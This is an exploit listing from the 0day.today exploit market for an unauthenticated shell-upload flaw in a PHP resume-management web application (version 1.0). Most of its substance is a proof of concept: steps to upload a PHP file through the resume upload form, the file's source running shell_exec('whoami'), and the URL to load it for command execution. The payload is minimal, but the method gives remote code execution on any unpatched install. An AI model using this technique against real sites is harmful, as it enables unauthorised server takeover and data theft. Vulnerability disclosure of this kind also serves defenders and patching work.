[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Resumes Management And Job Application Website 1.0 Shell Upload Vulnerability

Author
Arnav Tripathy
Risk
[
Security Risk High
]
0day-ID
0day-ID-35599
Category
web applications
Date add
04-01-2021
Platform
php
# Exploit Title: Resumes-management-and-job-application-website
unauthenticated RCE
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://egavilanmedia.com
# Software Link:
https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: linux/lamp

Submit rce.php in resume file upload unauthenticated.Contents of rce.php
<?php
$output = shell_exec('whoami');
echo "<h1>$output</h1>";
?>

Navigate to http://localhost/Resumes Management and Job Application
Website/files/rce.php

You will get the output of whoami

#  0day.today [2024-11-16]  #